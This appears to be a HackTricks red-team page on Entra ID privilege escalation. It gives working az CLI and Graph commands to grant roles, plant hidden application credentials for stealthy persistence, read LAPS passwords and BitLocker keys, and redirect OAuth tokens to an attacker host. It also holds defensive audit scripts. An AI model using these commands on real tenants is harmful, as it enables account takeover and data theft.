Az - EntraID Privesc
Tip
Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Note
Keep in mind that not every granular permission held by the built-in Entra ID roles can be used in a custom role.
## Roles
### Role: Privileged Role Administrator
This role has the granular permissions needed to assign roles to principals and to grant additional permissions to roles. Both actions can be abused to escalate privileges.
- Assign a role to a user:
```bash
# List enabled built-in roles (only roles already activated in the tenant are returned)
az rest --method GET \
--uri "https://graph.microsoft.com/v1.0/directoryRoles"
# Give a role (Global Administrator?) to a user
roleId="<roleId>"
userId="<userId>"
az rest --method POST \
--uri "https://graph.microsoft.com/v1.0/directoryRoles/$roleId/members/\$ref" \
--headers "Content-Type=application/json" \
--body "{
\"@odata.id\": \"https://graph.microsoft.com/v1.0/directoryObjects/$userId\"
}"
```
- Add more permissions to a role:
```bash
# List only custom roles
az rest --method GET \
--uri "https://graph.microsoft.com/v1.0/roleManagement/directory/roleDefinitions" | jq '.value[] | select(.isBuiltIn == false)'
# Change the permissions of a custom role (the PATCH replaces its rolePermissions)
az rest --method PATCH \
--uri "https://graph.microsoft.com/v1.0/roleManagement/directory/roleDefinitions/<role-id>" \
--headers "Content-Type=application/json" \
--body '{
"description": "Update basic properties of application registrations",
"rolePermissions": [
{
"allowedResourceActions": [
"microsoft.directory/applications/credentials/update"
]
}
]
}'
```
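Because a custom role only needs one of the actions described on this page to become a privilege-escalation path, it is worth auditing every custom role definition for them. The following Python is an added example (not code from this page or from Microsoft): it takes the JSON body returned by `GET /roleManagement/directory/roleDefinitions` (for instance the output of the `az rest` call above saved to a file) and reports which custom roles grant any of the actions this page discusses. `PRIVESC_ACTIONS` is this page's list rather than an official Microsoft classification, and the role definitions embedded below are constructed sample data.

```python
import json

# Granular directory actions this page shows can be turned into a takeover of
# another identity (app, service principal, group, user or device).
# This is the page's list, not an official Microsoft classification.
PRIVESC_ACTIONS = {
    "microsoft.directory/applications/credentials/update",
    "microsoft.directory/applications.myOrganization/credentials/update",
    "microsoft.directory/applications/owners/update",
    "microsoft.directory/applications/allProperties/update",
    "microsoft.directory/servicePrincipals/credentials/update",
    "microsoft.directory/servicePrincipals/synchronizationCredentials/manage",
    "microsoft.directory/servicePrincipals/owners/update",
    "microsoft.directory/groups/allProperties/update",
    "microsoft.directory/groups/owners/update",
    "microsoft.directory/groups/members/update",
    "microsoft.directory/groups/dynamicMembershipRule/update",
    "microsoft.directory/users/password/update",
    "microsoft.directory/users/basic/update",
    "microsoft.directory/devices/registeredOwners/update",
    "microsoft.directory/devices/registeredUsers/update",
    "microsoft.directory/deviceLocalCredentials/password/read",
    "microsoft.directory/bitlockerKeys/key/read",
}


def dangerous_custom_roles(role_definitions):
    """role_definitions: parsed body of GET /roleManagement/directory/roleDefinitions.
    Returns {displayName: sorted list of privesc-capable actions} for every enabled
    custom role (isBuiltIn == false) that grants at least one such action."""
    findings = {}
    for role in role_definitions.get("value", []):
        if role.get("isBuiltIn", True) or not role.get("isEnabled", True):
            continue
        granted = set()
        for perm in role.get("rolePermissions", []):
            for action in perm.get("allowedResourceActions", []):
                if action in PRIVESC_ACTIONS:
                    granted.add(action)
        if granted:
            findings[role["displayName"]] = sorted(granted)
    return findings


# Constructed sample in the shape of the Graph response (not real tenant data).
SAMPLE_ROLE_DEFINITIONS = {
    "value": [
        {"displayName": "Global Administrator", "isBuiltIn": True, "isEnabled": True,
         "rolePermissions": [{"allowedResourceActions": [
             "microsoft.directory/applications/credentials/update"]}]},
        {"displayName": "App Support", "isBuiltIn": False, "isEnabled": True,
         "rolePermissions": [{"allowedResourceActions": [
             "microsoft.directory/applications/basic/update",
             "microsoft.directory/applications/credentials/update"]}]},
        {"displayName": "Helpdesk Lite", "isBuiltIn": False, "isEnabled": True,
         "rolePermissions": [{"allowedResourceActions": [
             "microsoft.directory/users/basic/update"]}]},
        {"displayName": "Directory Reader Lite", "isBuiltIn": False, "isEnabled": True,
         "rolePermissions": [{"allowedResourceActions": [
             "microsoft.directory/users/standard/read"]}]},
    ]
}

if __name__ == "__main__":
    # Replace SAMPLE_ROLE_DEFINITIONS with json.load(open("roles.json")) for real output.
    for name, actions in dangerous_custom_roles(SAMPLE_ROLE_DEFINITIONS).items():
        print(name)
        for action in actions:
            print("   ", action)
```

Built-in roles are skipped on purpose: their permission sets are Microsoft's, and what matters for a tenant review is which custom roles quietly hand out one of these actions to a less privileged principal.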
## Applications
### `microsoft.directory/applications/credentials/update`
This allows an attacker to add credentials (passwords or certificates) to existing applications. If the application has privileged permissions, the attacker can authenticate as that application and obtain those permissions.
```bash
# Generate a new password without overwriting the existing ones
az ad app credential reset --id <appId> --append
# Generate a new certificate without overwriting the existing ones
az ad app credential reset --id <appId> --append --create-cert
```
### `microsoft.directory/applications.myOrganization/credentials/update`
This allows the same actions as `applications/credentials/update`, but scoped to single-directory (single-tenant) applications.
```bash
az ad app credential reset --id <appId> --append
```
### `microsoft.directory/applications/owners/update`
By adding themselves as an owner, an attacker can take control of the application, including its credentials and permissions.
```bash
az ad app owner add --id <AppId> --owner-object-id <UserId>
az ad app credential reset --id <appId> --append
# You can check the owners with
az ad app owner list --id <appId>
```
### `microsoft.directory/applications/allProperties/update`
An attacker could add a redirect URI to applications used by the tenant's users and then send them login URLs that use the new redirect URL in order to steal their tokens. Note that if the user had already signed in to the application, the authentication happens automatically without the user having to consent to anything.
It is also possible to change the permissions requested by the application to obtain more, but in that case the user will need to consent again to the request asking for all the permissions.
```bash
# Get the current redirect URIs
az ad app show --id ea693289-78f3-40c6-b775-feabd8bef32f --query "web.redirectUris"
# Add a new redirect URI (make sure to keep the ones already configured, the update replaces the list)
az ad app update --id <app-id> --web-redirect-uris "https://original.com/callback https://attack.com/callback"
```
## Application Permissions Escalation
As explained in this post, it used to be very common to find default applications with API permissions of type Application granted to them. An API permission (as it's called in the Entra ID console) of type Application means the application can call the API and perform actions without a user context (no user needs to sign in to the app) and without needing any Entra ID role to allow it. That is why it is very common to find highly privileged applications in every Entra ID tenant.
Then, if an attacker has any permission/role that allows them to update the credentials (secret or certificate) of the application, the attacker can generate a new credential and use it to authenticate as the application, obtaining all the permissions the application has.
Note that the mentioned blog post shows some of the API permissions of Microsoft's default applications; however, shortly after the report Microsoft fixed this and it's no longer possible to log in as those Microsoft applications. It is still possible to find custom applications with high privileges that could be abused.
How to list the API permissions of an application:
```bash
# Get the "API Permissions" of an App
## Get the ResourceAppId
az ad app show --id "<app-id>" --query "requiredResourceAccess" --output json
## e.g.
[
{
"resourceAccess": [
{
"id": "e1fe6dd8-ba31-4d61-89e7-88639da4683d",
"type": "Scope"
},
{
"id": "d07a8cc0-3d51-4b77-b3b0-32704d1f69fa",
"type": "Role"
}
],
"resourceAppId": "00000003-0000-0000-c000-000000000000"
}
]
## For the perms of type "Scope" (delegated, need a signed-in user)
az ad sp show --id <ResourceAppId> --query "oauth2PermissionScopes[?id=='<id>'].value" -o tsv
az ad sp show --id "00000003-0000-0000-c000-000000000000" --query "oauth2PermissionScopes[?id=='e1fe6dd8-ba31-4d61-89e7-88639da4683d'].value" -o tsv
## For the perms of type "Role" (application, no user context needed)
az ad sp show --id <ResourceAppId> --query "appRoles[?id=='<id>'].value" -o tsv
az ad sp show --id 00000003-0000-0000-c000-000000000000 --query "appRoles[?id=='d07a8cc0-3d51-4b77-b3b0-32704d1f69fa'].value" -o tsv
```
<details>
<summary>Get the API permissions of every application and flag APIs owned by Microsoft</summary>

```bash
#!/usr/bin/env bash
set -euo pipefail

# Known Microsoft first-party owner organization IDs.
MICROSOFT_OWNER_ORG_IDS=(
  "f8cdef31-a31e-4b4a-93e4-5f571e91255a"
  "72f988bf-86f1-41af-91ab-2d7cd011db47"
)

is_microsoft_owner() {
  local owner="$1"
  local id
  for id in "${MICROSOFT_OWNER_ORG_IDS[@]}"; do
    if [ "$owner" = "$id" ]; then
      return 0
    fi
  done
  return 1
}

# Resolve a permission id to its name, caching results to avoid repeated az calls.
get_permission_value() {
  local resource_app_id="$1"
  local perm_type="$2"
  local perm_id="$3"
  local key value
  key="${resource_app_id}|${perm_type}|${perm_id}"

  value="$(awk -F '\t' -v k="$key" '$1==k {print $2; exit}' "$tmp_perm_cache")"
  if [ -n "$value" ]; then
    printf '%s\n' "$value"
    return 0
  fi

  if [ "$perm_type" = "Scope" ]; then
    value="$(az ad sp show --id "$resource_app_id" --query "oauth2PermissionScopes[?id=='$perm_id'].value | [0]" -o tsv 2>/dev/null || true)"
  elif [ "$perm_type" = "Role" ]; then
    value="$(az ad sp show --id "$resource_app_id" --query "appRoles[?id=='$perm_id'].value | [0]" -o tsv 2>/dev/null || true)"
  else
    value=""
  fi

  [ -n "$value" ] || value="UNKNOWN"
  printf '%s\t%s\n' "$key" "$value" >> "$tmp_perm_cache"
  printf '%s\n' "$value"
}

command -v az >/dev/null 2>&1 || { echo "az CLI not found" >&2; exit 1; }
command -v jq >/dev/null 2>&1 || { echo "jq not found" >&2; exit 1; }
az account show >/dev/null

apps_json="$(az ad app list --all --query '[?length(requiredResourceAccess) > 0].[displayName,appId,requiredResourceAccess]' -o json)"

tmp_map="$(mktemp)"
tmp_ids="$(mktemp)"
tmp_perm_cache="$(mktemp)"
trap 'rm -f "$tmp_map" "$tmp_ids" "$tmp_perm_cache"' EXIT

# Build unique resourceAppId values used by applications.
jq -r '.[][2][]?.resourceAppId' <<<"$apps_json" | sort -u > "$tmp_ids"

# Resolve resourceAppId -> owner organization + API display name.
while IFS= read -r rid; do
  [ -n "$rid" ] || continue
  sp_json="$(az ad sp show --id "$rid" --query '{owner:appOwnerOrganizationId,name:displayName}' -o json 2>/dev/null || true)"
  owner="$(jq -r '.owner // "UNKNOWN"' <<<"$sp_json")"
  name="$(jq -r '.name // "UNKNOWN"' <<<"$sp_json")"
  printf '%s\t%s\t%s\n' "$rid" "$owner" "$name" >> "$tmp_map"
done < "$tmp_ids"

echo -e "appDisplayName\tappId\tresourceApiDisplayName\tresourceAppId\tisMicrosoft\tpermissions"

# Print all app API permissions and mark if the target API is Microsoft-owned.
while IFS= read -r row; do
  app_name="$(jq -r '.[0]' <<<"$row")"
  app_id="$(jq -r '.[1]' <<<"$row")"

  while IFS= read -r rra; do
    resource_app_id="$(jq -r '.resourceAppId' <<<"$rra")"
    map_line="$(awk -F '\t' -v id="$resource_app_id" '$1==id {print; exit}' "$tmp_map")"
    owner_org="$(awk -F'\t' '{print $2}' <<<"$map_line")"
    resource_name="$(awk -F'\t' '{print $3}' <<<"$map_line")"

    [ -n "$owner_org" ] || owner_org="UNKNOWN"
    [ -n "$resource_name" ] || resource_name="UNKNOWN"

    if is_microsoft_owner "$owner_org"; then
      is_ms="true"
    else
      is_ms="false"
    fi

    permissions_csv=""
    while IFS= read -r access; do
      perm_type="$(jq -r '.type' <<<"$access")"
      perm_id="$(jq -r '.id' <<<"$access")"
      perm_value="$(get_permission_value "$resource_app_id" "$perm_type" "$perm_id")"
      perm_label="${perm_type}:${perm_value}"
      if [ -z "$permissions_csv" ]; then
        permissions_csv="$perm_label"
      else
        permissions_csv="${permissions_csv},${perm_label}"
      fi
    done < <(jq -c '.resourceAccess[]' <<<"$rra")

    echo -e "${app_name}\t${app_id}\t${resource_name}\t${resource_app_id}\t${is_ms}\t${permissions_csv}"
  done < <(jq -c '.[2][]' <<<"$row")
done < <(jq -c '.[]' <<<"$apps_json")
```

</details>
## Service Principals
### `microsoft.directory/servicePrincipals/credentials/update`
This allows an attacker to add credentials to existing service principals. If the service principal has elevated privileges, the attacker can obtain and use those privileges.
```bash
az ad sp credential reset --id <sp-id> --append
```
Caution
The newly generated password won't be visible in the web console, so this can be a stealthy way to keep persistence over a service principal.
They can still be listed through the API with:
```bash
az ad sp list --query '[?length(keyCredentials) > 0 || length(passwordCredentials) > 0].[displayName, appId, keyCredentials, passwordCredentials]' -o json
```
If you get the error `"code":"CannotUpdateLockedServicePrincipalProperty","message":"Property passwordCredentials is invalid."` it's because the passwordCredentials property of the SP is locked and you first need to unlock it. The lock is a property of the application object that backs the SP, so you need a permission over applications (`microsoft.directory/applications/allProperties/update`) that lets you run:
```bash
# <app-object-id> is the object id of the application registration, not the SP object id
az rest --method PATCH --url https://graph.microsoft.com/v1.0/applications/<app-object-id> --body '{"servicePrincipalLockConfiguration": null}'
```
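Because a secret added with `--append` does not show up in the portal, defenders have to enumerate credentials through the API. The following Python is an added example, not part of the original page: it takes the JSON produced by the `az ad sp list` query above (rows of `[displayName, appId, keyCredentials, passwordCredentials]`) and flags unexpired credentials that were added in the last few days or whose validity window is unusually long, two traits typical of an attacker-added credential. The rows embedded below are constructed, and the 7-day and 730-day thresholds are arbitrary choices for the example.

```python
import json
import re
from datetime import datetime, timedelta, timezone


def parse_graph_time(ts):
    """Parse a Graph timestamp such as 2025-06-14T10:00:00.1234567Z.
    The fractional seconds are dropped so datetime.fromisoformat accepts the
    value on every Python 3 version."""
    return datetime.fromisoformat(re.sub(r"\.\d+", "", ts).replace("Z", "+00:00"))


def suspicious_credentials(rows, now, recent_days=7, max_lifetime_days=730):
    """rows: parsed output of
    az ad sp list --query '[?length(keyCredentials) > 0 || length(passwordCredentials) > 0]
                           .[displayName, appId, keyCredentials, passwordCredentials]' -o json
    Returns one finding per unexpired credential that was added within recent_days
    or is valid for longer than max_lifetime_days."""
    findings = []
    for display_name, app_id, key_creds, pw_creds in rows:
        for kind, creds in (("certificate", key_creds or []), ("password", pw_creds or [])):
            for cred in creds:
                start = parse_graph_time(cred["startDateTime"])
                end = parse_graph_time(cred["endDateTime"])
                if end < now:
                    continue  # expired: cannot be used to authenticate any more
                reasons = []
                if now - start <= timedelta(days=recent_days):
                    reasons.append("added within the last %d days" % recent_days)
                if end - start > timedelta(days=max_lifetime_days):
                    reasons.append("valid for more than %d days" % max_lifetime_days)
                if reasons:
                    findings.append({
                        "servicePrincipal": display_name,
                        "appId": app_id,
                        "kind": kind,
                        "keyId": cred.get("keyId"),
                        "reasons": reasons,
                    })
    return findings


# Constructed sample rows in the shape of the az query output (not real data).
SAMPLE_ROWS = json.loads("""[
  ["Prod Automation", "11111111-1111-1111-1111-111111111111",
   [],
   [{"keyId": "aaaa-1", "displayName": "rotated-yearly",
     "startDateTime": "2024-07-01T00:00:00Z", "endDateTime": "2025-07-01T00:00:00Z"},
    {"keyId": "aaaa-2", "displayName": null,
     "startDateTime": "2025-06-14T10:00:00.1234567Z", "endDateTime": "2125-06-14T10:00:00Z"}]],
  ["Legacy Sync", "22222222-2222-2222-2222-222222222222",
   [{"keyId": "bbbb-1", "displayName": "CN=legacy",
     "startDateTime": "2021-01-01T00:00:00Z", "endDateTime": "2022-01-01T00:00:00Z"}],
   []]
]""")

# Fixed "now" so the sample is reproducible; use datetime.now(timezone.utc) for real runs.
NOW = datetime(2025, 6, 15, tzinfo=timezone.utc)

if __name__ == "__main__":
    for f in suspicious_credentials(SAMPLE_ROWS, NOW):
        print(f["servicePrincipal"], f["kind"], f["keyId"], "; ".join(f["reasons"]))
```

On the sample data only the password `aaaa-2` is reported: it was created the day before and is valid for a century, while the yearly-rotated secret and the expired legacy certificate are left alone. Run it on real output with `suspicious_credentials(json.load(open("sps.json")), datetime.now(timezone.utc))`.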
### `microsoft.directory/servicePrincipals/synchronizationCredentials/manage`
This allows an attacker to add credentials to existing service principals. If the service principal has elevated privileges, the attacker can take over those privileges.
```bash
az ad sp credential reset --id <sp-id> --append
```
### `microsoft.directory/servicePrincipals/owners/update`
As with applications, this permission allows adding more owners to a service principal. Owning a service principal allows controlling its credentials and permissions.
```bash
# Add a new owner
spId="<spId>"
userId="<userId>"
az rest --method POST \
--uri "https://graph.microsoft.com/v1.0/servicePrincipals/$spId/owners/\$ref" \
--headers "Content-Type=application/json" \
--body "{
\"@odata.id\": \"https://graph.microsoft.com/v1.0/directoryObjects/$userId\"
}"
az ad sp credential reset --id <sp-id> --append
# You can check the owners with
az ad sp owner list --id <spId>
```
Caution
After adding the new owner I tried to remove it, but the API replied that the DELETE method was not supported, even though that is the method you need to use to delete an owner. So at the moment you can't remove owners.
### `microsoft.directory/servicePrincipals/disable` & `enable`
These permissions allow disabling and enabling service principals. An attacker could use them to enable a service principal they can somehow get access to in order to escalate privileges.
Note that for this technique the attacker will need additional permissions to take over the service principal once it is enabled.
```bash
# Disable
az ad sp update --id <ServicePrincipalId> --set accountEnabled=false
# Enable
az ad sp update --id <ServicePrincipalId> --set accountEnabled=true
```
### `microsoft.directory/servicePrincipals/getPasswordSingleSignOnCredentials` & `microsoft.directory/servicePrincipals/managePasswordSingleSignOnCredentials`
These permissions allow creating and reading the password-based single sign-on credentials stored for a service principal, which may grant access to third-party applications.
```bash
# Generate SSO creds for a user or a group
spID="<spId>"
user_or_group_id="<id>"
username="<username>"
password="<password>"
az rest --method POST \
--uri "https://graph.microsoft.com/beta/servicePrincipals/$spID/createPasswordSingleSignOnCredentials" \
--headers "Content-Type=application/json" \
--body "{\"id\": \"$user_or_group_id\", \"credentials\": [{\"fieldId\": \"param_username\", \"value\": \"$username\", \"type\": \"username\"}, {\"fieldId\": \"param_password\", \"value\": \"$password\", \"type\": \"password\"}]}"
# Get the credentials stored for a specific user or group (the credential set id is the user/group id)
credID="<credID>"
az rest --method POST \
--uri "https://graph.microsoft.com/v1.0/servicePrincipals/$spID/getPasswordSingleSignOnCredentials" \
--headers "Content-Type=application/json" \
--body "{\"id\": \"$credID\"}"
```
## Groups
### `microsoft.directory/groups/allProperties/update`
This permission allows adding users to highly privileged groups, leading to privilege escalation.
```bash
az ad group member add --group <GroupName> --member-id <UserId>
```
Note: this permission does not cover Entra ID role-assignable groups.
### `microsoft.directory/groups/owners/update`
This permission allows becoming an owner of groups. A group owner can manage the group's membership and settings, and can therefore escalate privileges through the group.
```bash
az ad group owner add --group <GroupName> --owner-object-id <UserId>
az ad group member add --group <GroupName> --member-id <UserId>
```
Note: this permission does not cover Entra ID role-assignable groups.
### `microsoft.directory/groups/members/update`
This permission allows adding members to a group. An attacker can add themselves or malicious accounts to privileged groups and gain elevated access.
```bash
az ad group member add --group <GroupName> --member-id <UserId>
```
### `microsoft.directory/groups/dynamicMembershipRule/update`
This permission allows updating the membership rule of a dynamic group. An attacker can change the dynamic rule so that they match it and get included in privileged groups without being explicitly added.
```bash
groupId="<group-id>"
az rest --method PATCH \
--uri "https://graph.microsoft.com/v1.0/groups/$groupId" \
--headers "Content-Type=application/json" \
--body '{
"membershipRule": "(user.otherMails -any (_ -contains \"security\")) -and (user.userType -eq \"guest\")",
"membershipRuleProcessingState": "On"
}'
```
Note: this permission does not cover Entra ID role-assignable groups.
## Dynamic Groups Privesc
It's possible for users to escalate privileges by modifying their own properties so that they get added as members of dynamic groups. For more information check:
## Users
### `microsoft.directory/users/password/update`
This permission allows resetting the password of non-admin users, letting an attacker escalate privileges to other users. This permission cannot be granted to custom roles.
```bash
az ad user update --id <user-id> --password "kweoifuh.234"
```
### `microsoft.directory/users/basic/update`
This permission allows modifying user attributes. It's common to find dynamic groups that add users based on attribute values, so this permission may let an attacker set the attribute value required to become a member of a specific dynamic group and escalate privileges.
```bash
#e.g. change the manager of a user (the manager reference is set on the victim, pointing at the new manager)
victimUser="<userID>"
managerUser="<userID>"
az rest --method PUT \
--uri "https://graph.microsoft.com/v1.0/users/$victimUser/manager/\$ref" \
--headers "Content-Type=application/json" \
--body "{\"@odata.id\": \"https://graph.microsoft.com/v1.0/users/$managerUser\"}"
#e.g. change the department of a user
az rest --method PATCH \
--uri "https://graph.microsoft.com/v1.0/users/$victimUser" \
--headers "Content-Type=application/json" \
--body "{\"department\": \"security\"}"
```
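Both dynamic-group attacks on this page (rewriting a group's `membershipRule`, and changing a user's own attributes so an existing rule matches) are easiest to reason about with a rule evaluator. The Python below is an added example, not part of the original page and not Microsoft's implementation: it parses a subset of the Entra dynamic membership rule syntax (`-eq`, `-ne`, `-contains`, `-startsWith`, `-any`/`-all` over multi-valued attributes, `-and`/`-or`/`-not` and parentheses) and evaluates it against a user object, so you can check which attribute change would pull a user into a group before touching the tenant. The user objects are constructed; treating string comparisons as case-insensitive and giving `-and` precedence over `-or` are simplifying assumptions of this example.

```python
import re

_TOKEN = re.compile(r'\s*(\(|\)|"(?:[^"\\]|\\.)*"|[^\s()]+)')
_norm = lambda v: v.lower() if isinstance(v, str) else v  # string compare assumed case-insensitive

def tokenize(rule):
    """Split a rule into parentheses, quoted strings and bare words."""
    tokens, pos = [], 0
    while rule[pos:].strip():
        m = _TOKEN.match(rule, pos)
        tokens.append(m.group(1))
        pos = m.end()
    return tokens

def _literal(tok):
    """Quoted string, null, true or false."""
    if len(tok) >= 2 and tok[0] == tok[-1] == '"':
        return tok[1:-1].replace('\\"', '"')
    if tok.lower() in ("null", "true", "false"):
        return {"null": None, "true": True, "false": False}[tok.lower()]
    raise ValueError("unsupported literal %s" % tok)

def _compare(actual, op, expected):
    """Apply one comparison operator to a single attribute value."""
    op = op.lower()
    if op in ("-eq", "-ne"):
        return (_norm(actual) == _norm(expected)) == (op == "-eq")
    if actual is None:  # string operators never match an absent attribute
        return False
    a, e = str(actual).lower(), str(expected).lower()
    if op == "-contains":
        return e in a
    if op == "-startswith":
        return a.startswith(e)
    raise ValueError("unsupported operator %s" % op)

class RuleEvaluator:
    """Recursive descent: or := and (-or and)* ; and := unary (-and unary)* ;
    unary := -not unary | primary ; primary := (or) | prop op value | prop -any/-all (_ op value)"""
    def __init__(self, rule):
        self.tokens, self.i = tokenize(rule), 0
    def _peek(self):
        return self.tokens[self.i] if self.i < len(self.tokens) else None
    def _next(self):
        if self._peek() is None:
            raise ValueError("unexpected end of rule")
        self.i += 1
        return self.tokens[self.i - 1]
    def _expect(self, want):
        if self._next() != want:
            raise ValueError("expected %r" % want)
    def _or(self, user):
        result = self._and(user)
        while (self._peek() or "").lower() == "-or":
            self._next()
            result = self._and(user) or result  # evaluate both sides so every token is consumed
        return result
    def _and(self, user):
        result = self._unary(user)
        while (self._peek() or "").lower() == "-and":
            self._next()
            result = self._unary(user) and result
        return result
    def _unary(self, user):
        if (self._peek() or "").lower() == "-not":
            self._next()
            return not self._unary(user)
        return self._primary(user)
    def _primary(self, user):
        tok = self._next()
        if tok == "(":
            result = self._or(user)
            self._expect(")")
            return result
        if not tok.lower().startswith("user."):
            raise ValueError("unsupported property %s" % tok)
        actual, op = user.get(tok[len("user."):]), self._next()
        if op.lower() in ("-any", "-all"):  # multi-valued attribute such as user.otherMails
            self._expect("(")
            self._expect("_")
            inner_op, inner_val = self._next(), _literal(self._next())
            self._expect(")")
            agg = any if op.lower() == "-any" else all
            return agg(_compare(item, inner_op, inner_val) for item in (actual or []))
        return _compare(actual, op, _literal(self._next()))

def matches(rule, user):
    """True if `user` (a dict of Entra user attributes) satisfies `rule`."""
    ev = RuleEvaluator(rule)
    result = ev._or(user)
    if ev._peek() is not None:
        raise ValueError("unexpected token %r" % ev._peek())
    return result

# The rule from the PATCH above, plus a typical attribute-based rule.
GUEST_RULE = '(user.otherMails -any (_ -contains "security")) -and (user.userType -eq "guest")'
DEPT_RULE = 'user.department -eq "security"'
# Constructed user objects (not real directory data).
VICTIM = {"department": "it", "userType": "Member", "otherMails": []}
ATTACKER_GUEST = {"userType": "Guest", "otherMails": ["eve@security-team.example"]}
```

`matches(DEPT_RULE, VICTIM)` is false, while `matches(DEPT_RULE, dict(VICTIM, department="Security"))` is true, which is exactly the effect of the department PATCH above; `matches(GUEST_RULE, ATTACKER_GUEST)` shows how the rewritten rule admits a guest whose `otherMails` the attacker controls.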
## Conditional Access Policies & MFA Bypass
Misconfigured Conditional Access policies that require MFA can be bypassed, check:
Az - Conditional Access Policies & MFA Bypass
## Devices
### `microsoft.directory/devices/registeredOwners/update`
This permission allows attackers to register themselves as owners of devices in order to gain control over them or access device-specific settings and data.
```bash
deviceId="<deviceId>"
userId="<userId>"
az rest --method POST \
--uri "https://graph.microsoft.com/v1.0/devices/$deviceId/owners/\$ref" \
--headers "Content-Type=application/json" \
--body "{\"@odata.id\": \"https://graph.microsoft.com/v1.0/directoryObjects/$userId\"}"
```
### `microsoft.directory/devices/registeredUsers/update`
This permission allows attackers to associate their account with devices in order to gain access or bypass security policies.
```bash
deviceId="<deviceId>"
userId="<userId>"
az rest --method POST \
--uri "https://graph.microsoft.com/v1.0/devices/$deviceId/registeredUsers/\$ref" \
--headers "Content-Type=application/json" \
--body "{\"@odata.id\": \"https://graph.microsoft.com/v1.0/directoryObjects/$userId\"}"
```
### `microsoft.directory/deviceLocalCredentials/password/read`
This permission allows attackers to read the backed-up local administrator account credentials of Microsoft Entra joined devices, including the password.
```bash
# List deviceLocalCredentials
az rest --method GET \
--uri "https://graph.microsoft.com/v1.0/directory/deviceLocalCredentials"
# Get the credentials (the id is the device id)
deviceLCID="<deviceLCID>"
az rest --method GET \
--uri "https://graph.microsoft.com/v1.0/directory/deviceLocalCredentials/$deviceLCID?\$select=credentials"
```
## BitLocker Keys
### `microsoft.directory/bitlockerKeys/key/read`
This permission allows reading BitLocker recovery keys, which lets an attacker decrypt drives and compromise the confidentiality of the data on them.
```bash
# List recovery keys
az rest --method GET \
--uri "https://graph.microsoft.com/v1.0/informationProtection/bitlocker/recoveryKeys"
# Get a key
recoveryKeyId="<recoveryKeyId>"
az rest --method GET \
--uri "https://graph.microsoft.com/v1.0/informationProtection/bitlocker/recoveryKeys/$recoveryKeyId?\$select=key"
```
## Other Interesting Permissions (TODO)
- `microsoft.directory/applications/permissions/update`
- `microsoft.directory/servicePrincipals/permissions/update`
- `microsoft.directory/applications.myOrganization/allProperties/update`
- `microsoft.directory/applications/allProperties/update`
- `microsoft.directory/servicePrincipals/appRoleAssignedTo/update`
- `microsoft.directory/applications/appRoles/update`
- `microsoft.directory/applications.myOrganization/permissions/update`